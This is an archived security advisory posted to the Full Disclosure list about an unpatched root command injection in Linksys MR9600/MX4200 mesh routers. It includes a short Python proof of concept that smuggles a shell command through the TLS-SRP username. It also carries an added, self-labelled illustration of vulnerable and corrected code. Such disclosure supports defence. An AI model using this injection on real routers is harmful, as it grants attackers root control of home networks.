[SYSS-2025-010] Linksys MX9600/MX4200 - OS Command Injection

Full Disclosure mailing list archives


From: Christian Zäske via Fulldisclosure <fulldisclosure () seclists org>
Date: Thu, 12 Feb 2026 11:13:11 +0100

Advisory ID:               SYSS-2025-010
Product:                   MR9600, MX4200 (and potentially others)
Manufacturer:              Linksys
Affected Version(s):       1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200 (and potentially others)
Tested Version(s):         1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200
Vulnerability Type:        OS Command Injection (CWE-78)
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2025-03-18
Solution Date:             -
Public Disclosure:         2026-02-12
CVE Reference:             Not yet assigned
Author of Advisory:        Christian Zäske, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Linksys MX4200 is a Wi-Fi mesh router targeting home users.

The manufacturer describes the product as follows (see [1]):

"This router supports the latest Wi-Fi® 6 (802.11ax) standard for
next-level streaming and gaming. Its powerful WiFi 6 mesh coverage
offers faster WiFi performance for lag-free online gaming and
simultaneous streaming to every device and corner of your home."

Due to missing neutralization of special elements, OS commands can
be injected via the handshake of a TLS-SRP connection and are
ultimately run as the root user.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Linksys MR9600 (and other models) provides a service (sct_server
binary) running on TCP port 6060 (all interfaces except WAN), which is
used to integrate other mesh devices into the network. The service
accepts TLS-SRP connections with a username and password.

The service uses a separate script (smcdb_auth) to retrieve credential
information for the given username. Since the service does not
neutralize special elements and appends the username as a command
line argument, arbitrary OS commands can be injected via the username
of the TLS-SRP handshake. These commands are run as the root user
without requiring a valid username or password.
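
The flaw class described above, next to two corrected forms, as an added
example that is not part of the original advisory or the device firmware.
HELPER, the lookup_* functions, the username policy and the crafted input
are assumptions made for illustration; the real smcdb_auth script and the
way sct_server invokes it are not shown in the advisory.

```python
import re
import shlex
import subprocess

# Stand-in for the credential lookup helper (assumption: the real smcdb_auth
# script and how sct_server invokes it are not shown in the advisory).
HELPER = 'printf "lookup:%s\\n" "$1"'

# Assumed username policy: short, alphanumeric start, no shell metacharacters,
# and no leading "-" that a helper could mistake for an option.
USERNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def _run(cmd, shell):
    # Run the command and return only what it wrote to stdout.
    return subprocess.run(cmd, shell=shell, capture_output=True,
                          text=True, timeout=5).stdout


def lookup_vulnerable(username):
    """Flawed pattern: username concatenated into a shell command line."""
    return _run("sh -c " + shlex.quote(HELPER) + " helper " + username,
                shell=True)


def lookup_argv(username):
    """No shell parsing: the username reaches the helper as one argv element."""
    return _run(["sh", "-c", HELPER, "helper", username], shell=False)


def lookup_hardened(username):
    """Allowlist check first, then argv passing; returns None on rejection."""
    if not USERNAME_RE.fullmatch(username):
        return None
    return lookup_argv(username)


if __name__ == "__main__":
    crafted = "; echo INJECTED;"  # constructed, harmless marker
    for fn in (lookup_vulnerable, lookup_argv, lookup_hardened):
        print(fn.__name__, repr(fn(crafted)))
    print("lookup_hardened", repr(lookup_hardened("node-01")))
```

In the concatenated form the shell treats the ";" as a command separator,
so the helper runs with an empty argument and the marker command runs
after it; in the argv form the same bytes arrive as inert data.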

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the "tlslite-ng" library, the following Python code will result
in the LED indicator at the top turning yellow, indicating that the OS
command was successfully executed. No valid username or password is
needed.

  from socket import *
  from tlslite.api import *

  sock = socket.socket(AF_INET, SOCK_STREAM)
  sock.connect(("192.168.1.1", 6060))

  conn = TLSConnection(sock)
  conn.handshakeClientSRP("; . /etc/led/lib_nodes_hw.sh; combo_solid yellow on;", "dummypass")

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no known solution yet.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-11-11: Vulnerability discovered
2025-03-18: Vulnerability reported to manufacturer
2025-04-07: First response from manufacturer
2025-04-14: Requested an update from manufacturer
2025-05-06: Acknowledgment of vulnerabilities by the manufacturer
2026-02-12: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Linksys MX4200
    https://support.linksys.com/kb/article/952-en/
[2] SySS Security Advisory SYSS-2025-010
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-010.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Zäske of SySS
GmbH.

E-Mail: christian.zaeske () syss de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc
Key ID: 0x7B00D164A32F9AC9
Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

Attachment: OpenPGP_0x7B00D164A32F9AC9.asc
Description: OpenPGP public key

Attachment: OpenPGP_signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Source: https://seclists.org/fulldisclosure/2026/Feb/13